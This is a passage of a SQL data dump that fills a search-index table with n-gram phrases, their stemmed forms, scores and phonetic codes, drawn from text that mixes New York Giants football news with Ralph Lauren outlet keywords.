jerry',0,1,1.5,'M2126',1,'en'),(18808,'modern','modern',0,0,0.4,'M365',4,'en'),(18809,'modern strength','modern strength',0,1,1.5,'M365236523',1,'en'),(18810,'modern strength of','modern strength of',0,1,1.6,'M3652365231',1,'en'),(18811,'mornhinweg','mornhinweg',0,0,0.6667,'M652',1,'en'),(18812,'mornhinweg said','mornhinweg said',0,1,1.5,'M6523',1,'en'),(18813,'mornhinweg said tuesday','mornhinweg said tuesday',0,1,1.7667,'M652323',1,'en'),(18814,'mornhinweg talk','mornhinweg talk',0,1,1.5,'M652342',1,'en'),(18815,'mornhinweg talk on','mornhinweg talk on',0,1,1.6,'M6523425',1,'en'),(18816,'my life','my life',0,1,1.2333,'M410',1,'en'),(18817,'my life it\'s','my life it',0,1,1.4,'M4132',1,'en'),(18818,'new york square','new york square',0,1,1.5,'N626',1,'en'),(18819,'nfl','nfl',0,0,0.2,'N140',1,'en'),(18820,'nfl draft','nfl draft',0,1,1.3,'N143613',1,'en'),(18821,'nfl draft but','nfl draft but',0,1,1.4333,'N14361313',1,'en'),(18822,'nfl draft on','nfl draft on',0,1,1.4,'N1436135',1,'en'),(18823,'no one','no one',0,1,1.2,'N000',1,'en'),(18824,'no one knows','no one knows',0,1,1.4,'N252',1,'en'),(18825,'not for','not for',0,1,1.2333,'N316',2,'en'),(18826,'not for certain','not for certain',0,1,1.5,'N3162635',1,'en'),(18827,'of by','of by',0,1,1.1667,'O100',1,'en'),(18828,'of by ebenezer','of by ebenezer',0,1,1.4667,'O1526',1,'en'),(18829,'of his','of his',0,1,1.2,'O120',2,'en'),(18830,'of his ralph','of his ralph',0,1,1.4,'O12641',1,'en'),(18831,'of jerry','of jerry',0,1,1.2667,'O126',1,'en'),(18832,'of jerry reese\'s','of jerry reese',0,1,1.5333,'O1262',1,'en'),(18833,'of long','of long',0,1,1.2333,'O1452',1,'en'),(18834,'of long syers','of long syers',0,1,1.4333,'O145262',1,'en'),(18835,'of the jets','of the jets',0,1,1.3667,'O13232',1,'en'),(18836,'of the upcoming','of the upcoming',0,1,1.5,'O131252',1,'en'),(18837,'of time','of time',0,1,1.2333,'O135',2,'en'),(18838,'of time for','of time for',0,1,1.3667,'O13516',1,'en'),(18839,'offense','offens',0,0,0.4667,'O152',1,'en'),(18840,'offense in','offens in',0,1,1.3333,'O1525',1,'en'),(18841,'offense in 2014','offens in 2014',0,1,1.5,'O1525',1,'en'),(18842,'often','often',1,0,0.0417,'O135',2,'en'),(18843,'often performs','often performs',0,1,1.4667,'O135161652',1,'en'),(18844,'often performs in','often performs in',0,1,1.5667,'O1351616525',1,'en'),(18845,'old receiver','old receiver',0,1,1.4,'O436216',1,'en'),(18846,'old receiver also','old receiver also',0,1,1.5667,'O43621642',1,'en'),(18847,'on cornerback','on cornerback',0,1,1.4333,'O5265612',1,'en'),(18848,'on cornerback prince','on cornerback prince',0,1,1.6667,'O52656121652',1,'en'),(18849,'on drafting','on drafting',0,1,1.3667,'O5361352',1,'en'),(18850,'on drafting a','on drafting a',0,1,1.4333,'O5361352',1,'en'),(18851,'on jan.14','on jan.14',0,1,1.3,'O525',1,'en'),(18852,'on jan.14 got','on jan.14 got',0,1,1.4333,'O52523',1,'en'),(18853,'on sunday','on sunday',0,1,1.3,'O5253',1,'en'),(18854,'on sunday it','on sunday it',0,1,1.4,'O5253',1,'en'),(18855,'on this','on this',0,1,1.2333,'O532',2,'en'),(18856,'on this project','on this project',0,1,1.5,'O5321623',1,'en'),(18857,'on thurs','on thurs',0,1,1.2667,'O5362',1,'en'),(18858,'on thurs and','on thurs and',0,1,1.4,'O536253',1,'en'),(18859,'on tuesday','on tuesday',0,1,1.3333,'O5323',1,'en'),(18860,'on tuesday he','on tuesday he',0,1,1.4333,'O5323',1,'en'),(18861,'on wednesday','on wednesday',0,1,1.4,'O53523',1,'en'),(18862,'on wednesday that','on wednesday that',0,1,1.5667,'O53523',1,'en'),(18863,'once','onc',1,0,0.0333,'O520',5,'en'),(18864,'once he','onc he',0,1,1.2333,'O520',1,'en'),(18865,'once he makes','onc he makes',0,1,1.4333,'O5252',1,'en'),(18866,'one knows','on knows',0,1,1.3,'O5252',1,'en'),(18867,'one knows who','on knows who',0,1,1.4333,'O5252',1,'en'),(18868,'one of','on of',0,1,1.2,'O510',5,'en'),(18869,'one of his','on of his',0,1,1.3333,'O512',1,'en'),(18870,'one position','on position',0,1,1.4,'O51235',1,'en'),(18871,'one position that','on position that',0,1,1.5667,'O512353',1,'en'),(18872,'opening','open',0,0,0.4667,'O152',2,'en'),(18873,'opening shot','open shot',0,1,1.4,'O1523',1,'en'),(18874,'opening shot polo','open shot polo',0,1,1.5667,'O152314',1,'en'),(18875,'option','option',0,0,0.4,'O135',1,'en'),(18876,'option on','option on',0,1,1.3,'O135',1,'en'),(18877,'option on cornerback','option on cornerback',0,1,1.6667,'O135265612',1,'en'),(18878,'option the','option the',0,1,1.3333,'O1353',1,'en'),(18879,'option the giants','option the giants',0,1,1.5667,'O13532532',1,'en'),(18880,'outlet with','outlet with',0,1,1.3667,'O343',1,'en'),(18881,'outlet with april','outlet with april',0,1,1.5667,'O343164',1,'en'),(18882,'p by','p by',0,1,1.1333,'P000',1,'en'),(18883,'p by rob','p by rob',0,1,1.2667,'P610',1,'en'),(18884,'pages 9','page 9',0,1,1.2333,'P200',1,'en'),(18885,'park','park',0,0,0.2667,'P620',2,'en'),(18886,'park crafted','park crafted',0,1,1.4,'P62613',1,'en'),(18887,'park crafted a','park crafted a',0,1,1.4667,'P62613',1,'en'),(18888,'particular giants','particular giants',0,1,1.5667,'P632462532',1,'en'),(18889,'particular giants p','particular giants p',0,1,1.6333,'P6324625321',1,'en'),(18890,'perfectly','perfectli',0,0,0.6,'P61234',2,'en'),(18891,'perfectly clear','perfectli clear',0,1,1.5,'P61234246',1,'en'),(18892,'perfectly clear on','perfectli clear on',0,1,1.6,'P612342465',1,'en'),(18893,'performs','perform',0,0,0.5333,'P61652',2,'en'),(18894,'performs in','perform in',0,1,1.3667,'P616525',1,'en'),(18895,'performs in new','perform in new',0,1,1.5,'P616525',1,'en'),(18896,'picks','pick',0,0,0.3333,'P200',1,'en'),(18897,'picks and','pick and',0,1,1.3,'P253',1,'en'),(18898,'picks and once','pick and once',0,1,1.4667,'P25352',1,'en'),(18899,'picks in','pick in',0,1,1.2667,'P250',1,'en'),(18900,'picks in the','pick in the',0,1,1.4,'P253',1,'en'),(18901,'pizza','pizza',0,0,0.3333,'P200',1,'en'),(18902,'pizza hut','pizza hut',0,1,1.3,'P230',1,'en'),(18903,'pizza hut super','pizza hut super',0,1,1.5,'P23216',1,'en'),(18904,'players','player',0,0,0.4667,'P462',1,'en'),(18905,'players especially','player especially',0,1,1.6,'P462124',1,'en'),(18906,'players especially high','player especially high',0,1,1.7667,'P4621242',1,'en'),(18907,'plus','plu',0,0,0.2667,'P420',2,'en'),(18908,'plus wind','plu wind',0,1,1.3,'P4253',1,'en'),(18909,'plus wind chill','plu wind chill',0,1,1.5,'P425324',1,'en'),(18910,'polo','polo',0,0,0.2667,'P400',9,'en'),(18911,'polo ralph','polo ralph',0,1,1.3333,'P4641',7,'en'),(18912,'polo ralph lauren','polo ralph lauren',0,1,1.5667,'P4641465',7,'en'),(18913,'position that','posit that',0,1,1.4333,'P2353',1,'en'),(18914,'position that seems','posit that seems',0,1,1.6333,'P2353252',1,'en'),(18915,'positive','posit',0,0,0.5333,'P231',3,'en'),(18916,'positive thing','posit thing',0,1,1.4667,'P231352',1,'en'),(18917,'positive thing at','posit thing at',0,1,1.5667,'P2313523',1,'en'),(18918,'preventative','prevent',0,0,0.8,'P61531',1,'en'),(18919,'preventative lineman','prevent lineman',0,1,1.6667,'P6153145',1,'en'),(18920,'preventative lineman that\'s','prevent lineman that',0,1,1.9,'P615314532',1,'en'),(18921,'prince','princ',0,0,0.4,'P652',1,'en'),(18922,'prince amukamara\'s','princ amukamara',0,1,1.6,'P65252562',1,'en'),(18923,'prince amukamara\'s contract','princ amukamara contract',0,1,1.9,'P6525256253623',1,'en'),(18924,'probably','probabl',0,0,0.5333,'P614',1,'en'),(18925,'probably 7','probabl 7',0,1,1.3333,'P614',1,'en'),(18926,'probably 7 12','probabl 7 12',0,1,1.4333,'P614',1,'en'),(18927,'project he','project he',0,1,1.3333,'P623',1,'en'),(18928,'project he was','project he was',0,1,1.4667,'P6232',1,'en'),(18929,'protecting','protect',0,0,0.6667,'P632352',1,'en'),(18930,'protecting lineman','protect lineman',0,1,1.6,'P63235245',1,'en'),(18931,'protecting lineman \'that','protect lineman that',0,1,1.8,'P632352453',1,'en'),(18932,'puppet','puppet',0,0,0.4,'P300',1,'en'),(18933,'puppet form','puppet form',0,1,1.3667,'P3165',1,'en'),(18934,'puppet form for','puppet form for',0,1,1.5,'P316516',1,'en'),(18935,'puppet is','puppet is',0,1,1.3,'P320',1,'en'),(18936,'puppet is a','puppet is a',0,1,1.3667,'P320',1,'en'),(18937,'puppet long','puppet long',0,1,1.3667,'P3452',1,'en'),(18938,'puppet long considered','puppet long considered',0,1,1.7333,'P345252363',1,'en'),(18939,'quarterback','quarterback',0,0,0.7333,'Q63612',1,'en'),(18940,'quarterback competition','quarterback competition',0,1,1.7667,'Q636125135',1,'en'),(18941,'quarterback competition with','quarterback competition with',0,1,1.9333,'Q6361251353',1,'en'),(18942,'question','question',0,0,0.5333,'Q350',2,'en'),(18943,'question of','question of',0,1,1.3667,'Q351',1,'en'),(18944,'question of by','question of by',0,1,1.4667,'Q351',1,'en'),(18945,'raider','raider',0,0,0.4,'R360',1,'en'),(18946,'raider that','raider that',0,1,1.3667,'R363',1,'en'),(18947,'raider that will','raider that will',0,1,1.5333,'R3634',1,'en'),(18948,'ralph','ralph',0,0,0.3333,'R410',13,'en'),(18949,'ralph lauren','ralph lauren',0,1,1.4,'R41465',13,'en'),(18950,'ralph lauren outlet','ralph lauren outlet',0,1,1.6333,'R41465343',6,'en'),(18951,'ralph lauren suits','ralph lauren suits',0,1,1.6,'R41465232',1,'en'),(18952,'receiver','receiv',0,0,0.5333,'R216',1,'en'),(18953,'receiver also','receiv also',0,1,1.4333,'R21642',1,'en'),(18954,'receiver also covets','receiv also covets',0,1,1.6667,'R21642132',1,'en'),(18955,'record','record',0,0,0.4,'R263',2,'en'),(18956,'record jerry','record jerry',0,1,1.4,'R26326',1,'en'),(18957,'record jerry reese','record jerry reese',0,1,1.6,'R263262',1,'en'),(18958,'reese','rees',0,0,0.3333,'R200',1,'en'),(18959,'reese the','rees the',0,1,1.3,'R230',1,'en'),(18960,'reese the giants\'','rees the giants',0,1,1.5667,'R232532',1,'en'),(18961,'reese\'s','rees',0,0,0.4667,'R200',1,'en'),(18962,'reese\'s seven','rees seven',0,1,1.4333,'R215',1,'en'),(18963,'reese\'s seven year','rees seven year',0,1,1.6,'R2156',1,'en'),(18964,'refine','refin',0,0,0.4,'R150',1,'en'),(18965,'refine it','refin it',0,1,1.3,'R153',1,'en'),(18966,'refine it he','refin it he',0,1,1.4,'R153',1,'en'),(18967,'relieved','reliev',0,0,0.5333,'R413',1,'en'),(18968,'relieved amukamara','reliev amukamara',0,1,1.6,'R4135256',1,'en'),(18969,'relieved amukamara said','reliev amukamara said',0,1,1.7667,'R413525623',1,'en'),(18970,'reps','rep',0,0,0.2667,'R120',3,'en'),(18971,'reps at','rep at',0,1,1.2333,'R123',1,'en'),(18972,'reps at minicamp','rep at minicamp',0,1,1.5333,'R1235251',1,'en'),(18973,'requires','requir',0,0,0.5333,'R262',2,'en'),(18974,'requires syers','requir syers',0,1,1.4667,'R26262',1,'en'),(18975,'requires syers four','requir syers four',0,1,1.6333,'R2626216',1,'en'),(18976,'respond','respond',0,0,0.4667,'R2153',1,'en'),(18977,'respond to','respond to',0,1,1.3333,'R2153',1,'en'),(18978,'respond to a','respond to a',0,1,1.4,'R2153',1,'en'),(18979,'rex','rex',0,0,0.2,'R200',1,'en'),(18980,'rex ryan','rex ryan',0,1,1.2667,'R265',1,'en'),(18981,'rex ryan on','rex ryan on',0,1,1.3667,'R265',1,'en'),(18982,'ro','ro',0,0,0.1333,'R000',1,'en'),(18983,'rob','rob',0,0,0.2,'R100',2,'en'),(18984,'rob vacchiano','rob vacchiano',0,1,1.4333,'R125',1,'en'),(18985,'rob vacchiano may','rob vacchiano may',0,1,1.5667,'R125',1,'en'),(18986,'round of','round of',0,1,1.2667,'R531',1,'en'),(18987,'round of the','round of the',0,1,1.4,'R5313',1,'en'),(18988,'round picks','round picks',0,1,1.3667,'R5312',1,'en'),(18989,'round picks in','round picks in',0,1,1.4667,'R53125',1,'en'),(18990,'ryan','ryan',0,0,0.2667,'R500',1,'en'),(18991,'ryan on','ryan on',0,1,1.2333,'R500',1,'en'),(18992,'ryan on drafting','ryan on drafting',0,1,1.5333,'R5361352',1,'en'),(18993,'safe','safe',0,0,0.2667,'S100',3,'en'),(18994,'safe to','safe to',0,1,1.2333,'S130',1,'en'),(18995,'safe to eliminate','safe to eliminate',0,1,1.5667,'S13453',1,'en'),(18996,'said','said',0,0,0.2667,'S300',8,'en'),(18997,'said as','said as',0,1,1.2333,'S320',1,'en'),(18998,'said as you\'re','said as you',0,1,1.4667,'S326',1,'en'),(18999,'said in','said in',0,1,1.2333,'S350',1,'en'),(19000,'said in respond','said in respond',0,1,1.5,'S3562153',1,'en'),(19001,'said the','said the',0,1,1.2667,'S300',1,'en'),(19002,'said the particular','said the particular',0,1,1.6333,'S3163246',1,'en'),(19003,'said tuesday','said tuesday',0,1,1.4,'S323',1,'en'),(19004,'said tuesday that','said tuesday that',0,1,1.5667,'S323',1,'en'),(19005,'same','same',0,0,0.2667,'S500',4,'en'),(19006,'same time','same time',0,1,1.3,'S535',1,'en'),(19007,'same time because','same time because',0,1,1.5667,'S53512',1,'en'),(19008,'samuel','samuel',0,0,0.4,'S540',1,'en'),(19009,'samuel would','samuel would',0,1,1.4,'S543',1,'en'),(19010,'samuel would probably','samuel would probably',0,1,1.7,'S5431614',1,'en'),(19011,'saw','saw',0,0,0.2,'S000',2,'en'),(19012,'saw the','saw the',0,1,1.2333,'S300',2,'en'),(19013,'saw the puppet','saw the puppet',0,1,1.4667,'S313',1,'en'),(19014,'says','sai',0,0,0.2667,'S000',6,'en'),(19015,'says he','sai he',0,1,1.2333,'S000',2,'en'),(19016,'says he was','sai he was',0,1,1.3667,'S000',1,'en'),(19017,'second','second',0,0,0.4,'S530',5,'en'),(19018,'second and','second and',0,1,1.3333,'S5353',1,'en'),(19019,'second and third','second and third',0,1,1.5333,'S535363',1,'en'),(19020,'seems safe','seem safe',0,1,1.3333,'S521',1,'en'),(19021,'seems safe to','seem safe to',0,1,1.4333,'S5213',1,'en'),(19022,'seen','seen',0,0,0.2667,'S500',2,'en'),(19023,'seen everything','seen everything',0,1,1.5,'S516352',1,'en'),(19024,'seen everything in','seen everything in',0,1,1.6,'S5163525',1,'en'),(19025,'seven','seven',0,0,0.3333,'S150',1,'en'),(19026,'seven year','seven year',0,1,1.3333,'S156',1,'en'),(19027,'seven year draft','seven year draft',0,1,1.5333,'S1563613',1,'en'),(19028,'several','sever',0,0,0.4667,'S164',3,'en'),(19029,'several hits','sever hits',0,1,1.4,'S16432',1,'en'),(19030,'several hits and','sever hits and',0,1,1.5333,'S1643253',1,'en'),(19031,'shining','shine',0,0,0.4667,'S520',1,'en'),(19032,'shining armor','shine armor',0,1,1.4333,'S52656',1,'en'),(19033,'shining armor amukamara','shine armor amukamara',0,1,1.7667,'S526565256',1,'en'),(19034,'shoot','shoot',0,0,0.3333,'S300',1,'en'),(19035,'shoot an','shoot an',0,1,1.2667,'S350',1,'en'),(19036,'shoot an ad','shoot an ad',0,1,1.3667,'S353',1,'en'),(19037,'shoot syers','shoot syers',0,1,1.3667,'S3262',1,'en'),(19038,'shoot syers said','shoot syers said',0,1,1.5333,'S32623',1,'en'),(19039,'shot','shot',0,0,0.2667,'S300',1,'en'),(19040,'shot polo','shot polo',0,1,1.3,'S314',1,'en'),(19041,'shot polo ralph','shot polo ralph',0,1,1.5,'S314641',1,'en'),(19042,'should take','should take',0,1,1.3667,'S432',1,'en'),(19043,'should take initial','should take initial',0,1,1.6333,'S432534',1,'en'),(19044,'single','singl',0,0,0.4,'S524',5,'en'),(19045,'single and','singl and',0,1,1.3333,'S52453',1,'en'),(19046,'single and a','singl and a',0,1,1.4,'S52453',1,'en'),(19047,'smith','smith',0,0,0.3333,'S530',1,'en'),(19048,'smith had','smith had',0,1,1.3,'S530',1,'en'),(19049,'smith had been','smith had been',0,1,1.4667,'S5315',1,'en'),(19050,'smith is','smith is',0,1,1.2667,'S532',1,'en'),(19051,'smith is headed','smith is headed',0,1,1.5,'S5323',1,'en'),(19052,'smith takes','smith takes',0,1,1.3667,'S532',1,'en'),(19053,'smith takes the','smith takes the',0,1,1.5,'S5323',1,'en'),(19054,'smith you','smith you',0,1,1.3,'S530',1,'en'),(19055,'smith you should','smith you should',0,1,1.5333,'S53243',1,'en'),(19056,'square','squar',0,0,0.4,'S600',1,'en'),(19057,'square park','squar park',0,1,1.3667,'S6162',1,'en'),(19058,'square park crafted','squar park crafted',0,1,1.6333,'S6162613',1,'en'),(19059,'square studio','squar studio',0,1,1.4333,'S623',1,'en'),(19060,'square studio at','squar studio at',0,1,1.5333,'S623',1,'en'),(19061,'square the','squar the',0,1,1.3333,'S630',1,'en'),(19062,'square the puppet','squar the puppet',0,1,1.5667,'S6313',1,'en'),(19063,'strength','strength',0,0,0.5333,'S36523',1,'en'),(19064,'strength of','strength of',0,1,1.3667,'S365231',1,'en'),(19065,'strength of the','strength of the',0,1,1.5,'S3652313',1,'en'),(19066,'studio','studio',0,0,0.4,'S300',1,'en'),(19067,'studio at','studio at',0,1,1.3,'S300',1,'en'),(19068,'studio at duffy','studio at duffy',0,1,1.5,'S310',1,'en'),(19069,'studying','studi',0,0,0.5333,'S352',1,'en'),(19070,'studying marty','studi marty',0,1,1.4667,'S352563',1,'en'),(19071,'studying marty mornhinweg','studi marty mornhinweg',0,1,1.8333,'S3525635652',1,'en'),(19072,'suit','suit',0,0,0.2667,'S300',1,'en'),(19073,'suit for','suit for',0,1,1.2667,'S316',1,'en'),(19074,'suit for the','suit for the',0,1,1.4,'S3163',1,'en'),(19075,'suits','suit',0,0,0.3333,'S320',2,'en'),(19076,'suits build','suit build',0,1,1.3667,'S32143',1,'en'),(19077,'suits build a','suit build a',0,1,1.4333,'S32143',1,'en'),(19078,'sunday','sundai',0,0,0.4,'S530',1,'en'),(19079,'sunday it','sundai it',0,1,1.3,'S530',1,'en'),(19080,'sunday it usually','sundai it usually',0,1,1.5667,'S5324',1,'en'),(19081,'super bowl','super bowl',0,1,1.3333,'S1614',1,'en'),(19082,'super bowl large','super bowl large',0,1,1.5333,'S161462',1,'en'),(19083,'super bowl xlviii','super bowl xlviii',0,1,1.5667,'S1614241',1,'en'),(19084,'syers','syer',0,0,0.3333,'S620',1,'en'),(19085,'syers four','syer four',0,1,1.3333,'S6216',1,'en'),(19086,'syers four to','syer four to',0,1,1.4333,'S62163',1,'en'),(19087,'syers had','syer had',0,1,1.3,'S623',1,'en'),(19088,'syers had to','syer had to',0,1,1.4,'S623',1,'en'),(19089,'syers said','syer said',0,1,1.3333,'S623',1,'en'),(19090,'syers said as','syer said as',0,1,1.4333,'S6232',1,'en'),(19091,'syers who','syer who',0,1,1.3,'S620',1,'en'),(19092,'syers who often','syer who often',0,1,1.5,'S62135',1,'en'),(19093,'take initial','take initial',0,1,1.4,'T2534',1,'en'),(19094,'take initial first','take initial first',0,1,1.6,'T25341623',1,'en'),(19095,'takes','take',0,0,0.3333,'T200',2,'en'),(19096,'takes a','take a',0,1,1.2333,'T200',1,'en'),(19097,'takes a week','take a week',0,1,1.4,'T200',1,'en'),(19098,'takes puppet','take puppet',0,1,1.4,'T213',1,'en'),(19099,'takes puppet form','take puppet form',0,1,1.5667,'T213165',1,'en'),(19100,'takes the','take the',0,1,1.3,'T230',1,'en'),(19101,'takes the opening','take the opening',0,1,1.5667,'T23152',1,'en'),(19102,'talk','talk',0,0,0.2667,'T420',2,'en'),(19103,'talk on','talk on',0,1,1.2333,'T425',1,'en'),(19104,'talk on tuesday','talk on tuesday',0,1,1.5,'T425323',1,'en'),(19105,'team captain','team captain',0,1,1.4,'T52135',1,'en'),(19106,'team captain absolutely','team captain absolutely',0,1,1.7667,'T5213512434',1,'en'),(19107,'team captain victor','team captain victor',0,1,1.6333,'T521351236',1,'en'),(19108,'team reps','team reps',0,1,1.3,'T5612',2,'en'),(19109,'team reps at','team reps at',0,1,1.4,'T56123',1,'en'),(19110,'team took','team took',0,1,1.3,'T532',1,'en'),(19111,'team took a','team took a',0,1,1.3667,'T532',1,'en'),(19112,'temporary','temporari',0,0,0.6,'T516',1,'en'),(19113,'temporary times','temporari times',0,1,1.5,'T516352',1,'en'),(19114,'temporary times square','temporari times square',0,1,1.7333,'T5163526',1,'en'),(19115,'that allows','that allows',0,1,1.3667,'T420',1,'en'),(19116,'that allows you','that allows you',0,1,1.5,'T420',1,'en'),(19117,'that beyond','that beyond',0,1,1.3667,'T153',1,'en'),(19118,'that beyond just','that beyond just',0,1,1.5333,'T15323',1,'en'),(19119,'that i have','that i have',0,1,1.3667,'T100',1,'en'),(19120,'that in','that in',0,1,1.2333,'T500',2,'en'),(19121,'that in today\'s','that in today',0,1,1.5,'T532',1,'en'),(19122,'that looks','that looks',0,1,1.3333,'T420',1,'en'),(19123,'that looks just','that looks just',0,1,1.5,'T423',1,'en'),(19124,'that luxury','that luxury',0,1,1.3667,'T426',1,'en'),(19125,'that luxury on','that luxury on',0,1,1.4667,'T4265',1,'en'),(19126,'that seems','that seems',0,1,1.3333,'T252',1,'en'),(19127,'that seems safe','that seems safe',0,1,1.5,'T2521',1,'en'),(19128,'that smith','that smith',0,1,1.3333,'T253',1,'en'),(19129,'that smith takes','that smith takes',0,1,1.5333,'T2532',1,'en'),(19130,'that will','that will',0,1,1.3,'T400',2,'en'),(19131,'that will air','that will air',0,1,1.4333,'T460',1,'en'),(19132,'that\'s modern','that modern',0,1,1.4333,'T25365',1,'en'),(19133,'that\'s modern strength','that modern strength',0,1,1.7333,'T25365236523',1,'en'),(19134,'the 27','the 27',0,1,1.2,'T000',1,'en'),(19135,'the 27 year','the 27 year',0,1,1.3667,'T600',1,'en'),(19136,'the ad','the ad',0,1,1.2,'T000',1,'en'),(19137,'the ad two','the ad two',0,1,1.3333,'T000',1,'en'),(19138,'the fifth','the fifth',0,1,1.3,'T130',1,'en'),(19139,'the fifth year','the fifth year',0,1,1.4667,'T136',1,'en'),(19140,'the first ro','the first ro',0,1,1.4,'T16236',1,'en'),(19141,'the first round','the first round',0,1,1.5,'T1623653',1,'en'),(19142,'the former','the former',0,1,1.3333,'T1656',1,'en'),(19143,'the former raider','the former raider',0,1,1.5667,'T165636',1,'en'),(19144,'the giants','the giants',0,1,1.3333,'T2532',1,'en'),(19145,'the giants offense','the giants offense',0,1,1.6,'T2532152',1,'en'),(19146,'the giants used','the giants used',0,1,1.5,'T25323',1,'en'),(19147,'the giants\'','the giants',0,1,1.3667,'T2532',1,'en'),(19148,'the giants\' gm','the giants gm',0,1,1.4667,'T25325',1,'en'),(19149,'the jets','the jets',0,1,1.2667,'T232',1,'en'),(19150,'the jets after','the jets after',0,1,1.4667,'T232136',1,'en'),(19151,'the jets uses','the jets uses',0,1,1.4333,'T232',1,'en'),(19152,'the long','the long',0,1,1.2667,'T452',1,'en'),(19153,'the long marionette','the long marionette',0,1,1.6333,'T4525653',1,'en'),(19154,'the nfl','the nfl',0,1,1.2333,'T514',1,'en'),(19155,'the nfl draft','the nfl draft',0,1,1.4333,'T5143613',1,'en'),(19156,'the opening','the opening',0,1,1.3667,'T152',1,'en'),(19157,'the opening shot','the opening shot',0,1,1.5333,'T1523',1,'en'),(19158,'the particular giants','the particular giants',0,1,1.7,'T1632462532',1,'en'),(19159,'the puppet','the puppet',0,1,1.3333,'T130',1,'en'),(19160,'the puppet is','the puppet is',0,1,1.4333,'T132',1,'en'),(19161,'the puppet long','the puppet long',0,1,1.5,'T13452',1,'en'),(19162,'the same','the same',0,1,1.2667,'T250',3,'en'),(19163,'the same time','the same time',0,1,1.4333,'T2535',1,'en'),(19164,'the team took','the team took',0,1,1.4333,'T532',1,'en'),(19165,'the upcoming','the upcoming',0,1,1.4,'T1252',2,'en'),(19166,'the upcoming nfl','the upcoming nfl',0,1,1.5333,'T1252514',1,'en'),(19167,'there\'s','there',0,0,0.4667,'T620',3,'en'),(19168,'there\'s bit','there bit',0,1,1.3667,'T6213',1,'en'),(19169,'there\'s bit of','there bit of',0,1,1.4667,'T62131',1,'en'),(19170,'there\'s one','there one',0,1,1.3667,'T625',1,'en'),(19171,'there\'s one position','there one position',0,1,1.6667,'T6251235',1,'en'),(19172,'they did','thei did',0,1,1.2667,'T000',1,'en'),(19173,'they did not','thei did not',0,1,1.4,'T530',1,'en'),(19174,'thing at','thing at',0,1,1.2667,'T523',1,'en'),(19175,'thing at the','thing at the',0,1,1.4,'T523',1,'en'),(19176,'third','third',0,0,0.3333,'T630',4,'en'),(19177,'third round','third round',0,1,1.3667,'T63653',1,'en'),(19178,'third round picks','third round picks',0,1,1.5667,'T6365312',1,'en'),(19179,'this project','thi project',0,1,1.4,'T21623',1,'en'),(19180,'this project he','thi project he',0,1,1.5,'T21623',1,'en'),(19181,'thurs','thur',0,0,0.3333,'T620',1,'en'),(19182,'thurs and','thur and',0,1,1.3,'T6253',1,'en'),(19183,'thurs and friday','thur and friday',0,1,1.5333,'T6253163',1,'en'),(19184,'time because','time because',0,1,1.4,'T512',1,'en'),(19185,'time because amukamara','time because amukamara',0,1,1.7333,'T5125256',1,'en'),(19186,'time for','time for',0,1,1.2667,'T516',1,'en'),(19187,'time for developing','time for developing',0,1,1.6333,'T516314152',1,'en'),(19188,'times square','time square',0,1,1.4,'T526',1,'en'),(19189,'times square studio','time square studio',0,1,1.6333,'T52623',1,'en'),(19190,'to a question','to a question',0,1,1.4333,'T235',1,'en'),(19191,'to be a','to be a',0,1,1.2333,'T100',5,'en'),(19192,'to build his','to build his',0,1,1.4,'T1432',1,'en'),(19193,'to cut','to cut',0,1,1.2,'T230',1,'en'),(19194,'to cut fabric','to cut fabric',0,1,1.4333,'T23162',1,'en'),(19195,'to eliminate','to eliminate',0,1,1.4,'T453',1,'en'),(19196,'to eliminate preventative','to eliminate preventative',0,1,1.8333,'T453161531',1,'en'),(19197,'to five','to five',0,1,1.2333,'T100',1,'en'),(19198,'to five days','to five days',0,1,1.4,'T132',1,'en'),(19199,'to refine','to refine',0,1,1.3,'T615',1,'en'),(19200,'to refine it','to refine it',0,1,1.4,'T6153',1,'en'),(19201,'to seen','to seen',0,1,1.2333,'T250',1,'en'),(19202,'to seen everything','to seen everything',0,1,1.6,'T2516352',1,'en'),(19203,'to shoot','to shoot',0,1,1.2667,'T230',1,'en'),(19204,'to shoot an','to shoot an',0,1,1.3667,'T235',1,'en'),(19205,'today\'s','todai',0,0,0.4667,'T200',2,'en'),(19206,'today\'s nfl','todai nfl',0,1,1.3667,'T2514',1,'en'),(19207,'took','took',0,0,0.2667,'T200',3,'en'),(19208,'took a','took a',0,1,1.2,'T200',1,'en'),(19209,'took a defensive','took a defensive',0,1,1.5333,'T231521',1,'en'),(19210,'treated','treat',0,0,0.4667,'T630',1,'en'),(19211,'treated giants','treat giants',0,1,1.4667,'T632532',1,'en'),(19212,'treated giants learned','treat giants learned',0,1,1.7333,'T6325324653',1,'en'),(19213,'true','true',1,0,0.0333,'T600',2,'en'),(19214,'true that','true that',0,1,1.3,'T630',1,'en'),(19215,'true that i','true that i',0,1,1.3667,'T630',1,'en'),(19216,'tuesday','tuesdai',0,0,0.4667,'T230',1,'en'),(19217,'tuesday at','tuesdai at',0,1,1.3333,'T230',1,'en'),(19218,'tuesday at fox\'s','tuesdai at fox',0,1,1.5333,'T2312',1,'en'),(19219,'tuesday he','tuesdai he',0,1,1.3333,'T230',1,'en'),(19220,'tuesday he can','tuesdai he can',0,1,1.4667,'T2325',1,'en'),(19221,'tuesday that','tuesdai that',0,1,1.4,'T230',1,'en'),(19222,'tuesday that smith','tuesdai that smith',0,1,1.6,'T23253',1,'en'),(19223,'two days','two days',0,1,1.2667,'T200',1,'en'),(19224,'two days later','two days later',0,1,1.4667,'T2436',1,'en'),(19225,'uk','uk',0,0,0.1333,'U200',7,'en'),(19226,'uk record','uk record',0,1,1.3,'U26263',1,'en'),(19227,'uk record jerry','uk record jerry',0,1,1.5,'U2626326',1,'en'),(19228,'upcoming','upcom',0,0,0.5333,'U1252',2,'en'),(19229,'upcoming nfl','upcom nfl',0,1,1.4,'U1252514',1,'en'),(19230,'upcoming nfl draft','upcom nfl draft',0,1,1.6,'U12525143613',1,'en'),(19231,'used','us',0,0,0.2667,'U230',8,'en'),(19232,'used the','us the',0,1,1.2667,'U230',1,'en'),(19233,'used the fifth','us the fifth',0,1,1.4667,'U2313',1,'en'),(19234,'uses in','us in',0,1,1.2333,'U250',1,'en'),(19235,'uses in the','us in the',0,1,1.3667,'U253',1,'en'),(19236,'usually','usual',0,0,0.4667,'U240',3,'en'),(19237,'usually requires','usual requires',0,1,1.5333,'U246262',1,'en'),(19238,'usually requires syers','usual requires syers',0,1,1.7333,'U24626262',1,'en'),(19239,'usually takes','usual takes',0,1,1.4333,'U2432',1,'en'),(19240,'usually takes a','usual takes a',0,1,1.5,'U2432',1,'en'),(19241,'vacchiano','vacchiano',0,0,0.6,'V250',1,'en'),(19242,'vacchiano may','vacchiano may',0,1,1.4333,'V250',1,'en'),(19243,'vacchiano may likely','vacchiano may 